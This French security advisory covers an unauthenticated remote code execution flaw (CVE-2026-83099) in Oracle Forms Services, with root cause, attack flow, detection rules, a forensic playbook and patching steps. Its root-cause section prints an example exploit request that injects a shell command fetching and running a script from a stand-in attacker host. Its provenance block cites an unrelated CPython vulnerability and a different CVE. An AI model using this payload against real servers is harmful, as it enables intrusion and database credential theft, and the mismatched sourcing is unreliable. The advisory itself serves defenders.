CVE-2026-83099 : exécution de code à distance non authentifiée dans Oracle forms services
SCORE DE MENACE HERMES & RISQUE D'EXÉCUTION SUR L'ENVIRONNEMENT FORMS
Cible :Oracle Fusion Middleware — Oracle Forms Services (frmservlet, lservlet et moteur d'exécution frmweb) Le CVSS v3.1 attribue la note maximale de 10.0 (Critique), et Hermes confirme un score de 98 (EXTRÊME). Oracle Forms est largement déployé dans les banques, la santé et les administrations pour exécuter les applications transactionnelles de gestion. Un attaquant distant non authentifié peut exploiter le servlet Forms via HTTP pour faire exécuter des commandes système arbitraires sous le compte oracle, s'emparer des identifiants de bases de données et compromettre les clusters Oracle Database.
SÉVÉRITÉ AGENTIQUE HASS & DÉTOURNEMENT TRANSACTIONNEL DE BASES DE DONNÉES
Cible :Middleware transactionnel, moteur d'exécution Forms et écouteur réseau Oracle Net Oracle Forms maintient des sessions de base de données permanentes et hautement privilégiées via SQL*Net / TNS. Contrôler le serveur d'exécution Forms expose les pools de connexion aux bases de données, les transactions SQL non chiffrées et les portefeuilles (wallets) de clés d'entreprise.
CVE-2026-83099: Unauthenticated Remote Code Execution in Oracle Forms ServicesVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in CPython Interpreter & Standard Library documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique et matrice des versions affectées
Section intitulée « 1. Contexte technique et matrice des versions affectées »Oracle Forms est un framework de développement d’applications d’entreprise intégré à Oracle Fusion Middleware, couramment exposé derrière Oracle HTTP Server (OHS).
| Paramètre | Spécification technique | Portée opérationnelle |
|---|---|---|
| Identifiant CVE | CVE-2026-83099 | Avis Oracle CSPU Septembre 2026 |
| Classe de vulnérabilité | Exécution de code à distance (CWE-94) | Injection d’arguments dans le répartiteur de servlets Forms |
| Composant affecté | Oracle Forms Services (frmservlet, frmweb) | Servlet d’écoute et lanceur de processus d’exécution |
| Protocole / port | HTTP / HTTPS (Ports par défaut 9001, 7001, 443) | Accessible depuis les intranets et passerelles d’application |
| Authentification requise | Aucune (PR:N) | Requête HTTP directe sans identifiants |
| Interaction utilisateur | Aucune (UI:N) | Exécution immédiate à réception de la requête |
| Changement de périmètre | Oui (S:C) | Permet d’atteindre l’OS hôte et les instances Oracle Database |
| Privilèges obtenus | Contrôle total du middleware et de l’OS | Exécution de commandes sous le compte oracle |
| Versions affectées | 12.2.1.19.0 et 14.1.2.0.0 | Versions supportées d’Oracle Forms |
| Correctif requis | PSU de septembre 2026 pour Oracle Forms | Installation via OPatch et durcissement de formsweb.cfg |
2. Anatomie de la vulnérabilité et analyse de la cause racine
Section intitulée « 2. Anatomie de la vulnérabilité et analyse de la cause racine »Injection d’arguments dans le lanceur forms
Section intitulée « Injection d’arguments dans le lanceur forms »Lorsqu’un navigateur accède à une application Oracle Forms, il émet une requête HTTP initiale vers le servlet d’écoute :
GET /forms/frmservlet?config=webstart&form=main.fmx HTTP/1.1Host: forms.corp.internal:9001Le servlet frmservlet traite les paramètres d’URL et les blocs de configuration définis dans formsweb.cfg, puis ordonne au gestionnaire de processus Forms (frmsrv) de lancer un binaire compilé C : frmweb.
Avant le correctif de septembre 2026 :
- Le servlet
frmservletne filtrait pas correctement certains paramètres contrôlables par l’utilisateur (tels queotherparamsou les définitions de variables d’environnement). - Un attaquant pouvait injecter des délimiteurs de commande et des variables d’environnement malveillantes (
LD_PRELOAD,BASH_ENV) directement dans la ligne de commande d’instanciation defrmweb. - Lors de l’appel système
execve()instanciantfrmweb, les paramètres injectés forçaient le chargement d’une bibliothèque partagée pirate ou l’exécution d’un interpréteur de commandes avant le démarrage normal de l’application.
POST /forms/frmservlet HTTP/1.1Host: forms.corp.internal:9001Content-Type: application/x-www-form-urlencoded
config=default&otherparams=%20-D%20foo%3b%20/bin/sh%20-c%20"curl%20http://attacker.c2/rev.sh|bash"%3bPuisque frmweb est engendré directement par le conteneur middleware, la commande injectée s’exécute immédiatement avec les droits du compte oracle, offrant une prise de contrôle intégrale du serveur hôte.
3. Flux d’attaque et cinématique de compromission
Section intitulée « 3. Flux d’attaque et cinématique de compromission »sequenceDiagram autonumber actor Attacker as Attaquant distant (Non authentifié) participant OHS as Oracle HTTP Server / Reverse Proxy participant Servlet as Servlet d'écoute Forms (frmservlet) participant Frmweb as Processus d'exécution (frmweb) participant DB as Base de données Oracle interne
Attacker->>OHS: Requête HTTP POST avec injection de paramètres (CVE-2026-83099) OHS->>Servlet: Transmission de la requête vers /forms/frmservlet Servlet->>Servlet: Analyse de la requête sans assainissement des arguments Servlet->>Frmweb: Instanciation de frmweb avec arguments injectés Note over Frmweb: Exécution immédiate du shell malveillant Frmweb-->>Attacker: Reverse shell interactif établi (UID oracle) Attacker->>DB: Récupération des wallets, tnsnames.ora et sessions SQL*Net4. Ingénierie de détection et règles de chasse
Section intitulée « 4. Ingénierie de détection et règles de chasse »title: Processus suspect engendré par le runtime Oracle Formsid: cve-2026-83099-forms-rce-frstatus: experimentaldescription: Détecte l'instanciation d'un shell interactif ou d'utilitaires réseau par le processus frmweb ou frmsrv d'Oracle Forms.references: - https://www.oracle.com/security-alerts/cspusep2026.htmlauthor: Hermes Codex DFIR Teamdate: 2026-09-17logsource: category: process_creation product: linuxdetection: selection_parent: ParentImage|endswith: - '/frmweb' - '/frmsrv' - '/frmservlet' selection_child: Image|endswith: - '/sh' - '/bash' - '/dash' - '/python' - '/curl' - '/wget' - '/nc' condition: selection_parent and selection_childfalsepositives: - Scripts de maintenance personnalisés appelés par des triggers HOST Forms (audit requis)level: criticaltags: - attack.execution - attack.t1059.004alert http any any -> any [9001,7001,443] ( msg:"HERMES THREAT - Tentative d'injection RCE Oracle Forms frmservlet (CVE-2026-83099)"; flow:to_server,established; content:"/forms/frmservlet"; http_uri; pcre:"/(otherparams|envVars|config)=.*(%3b|%26|%7c|bin%2fsh|bash)/i"; threshold:type limit, track by_src, count 1, seconds 60; reference:cve,2026-83099; classtype:attempted-admin; sid:202683099; rev:1;)## Surveillance des processus enfants engendrés par Forms-a always,exit -F arch=b64 -S execve -F ppid=$(pgrep -d ',' frmsrv) -k oracle_forms_exec-w /u01/app/oracle/middleware/forms/ -p wa -k forms_bin_tamper5. Playbook d’investigation forensique
Section intitulée « 5. Playbook d’investigation forensique »Lors de la réponse à incident sur un serveur Forms :
- Lignée des processus et détection d’anomalies :
Inspecter les processus en cours d’exécution :
Identifier tout shell enfant (
Fenêtre de terminal ps -ef | grep -E "frmweb|frmsrv"pstree -p $(pgrep frmsrv)sh,bash) ou outil réseau suspect s’exécutant sous l’UIDoracle. - Examen des journaux du servlet forms :
Analyser
$DOMAIN_HOME/servers/WLS_FORMS/logs/access.logpour détecter des requêtes vers/forms/frmservletcomprenant des points-virgules (;), des pipes (|) ou des encodages de commandes. - Corrélation avec les bases de données backend :
Le compte
oracleayant accès aux portefeuilles de mots de passe et au fichiertnsnames.ora, vérifier les journaux d’écoute Oracle Database (listener.log) pour repérer toute connexion inattendue en provenance du serveur Forms.
6. Remédiation, correctifs et durcissement
Section intitulée « 6. Remédiation, correctifs et durcissement »-
Application du correctif Oracle de septembre 2026 : Installer le PSU de septembre 2026 via OPatch :
Fenêtre de terminal cd $ORACLE_HOME/FORMS_PATCH_SEP2026opatch applyRedémarrer le serveur managé WLS_FORMS.
-
Durcissement de la configuration
formsweb.cfg: Désactiver la substitution dynamique de paramètres en configurantallowGenericResources = falseet en verrouillantrestrictedURLparamsdansformsweb.cfg. -
Isolement réseau et filtrage des flux sortants : Restreindre l’accès au port de Forms aux seuls utilisateurs VPN d’entreprise et bloquer les flux Internet sortants pour empêcher l’établissement de reverse shells.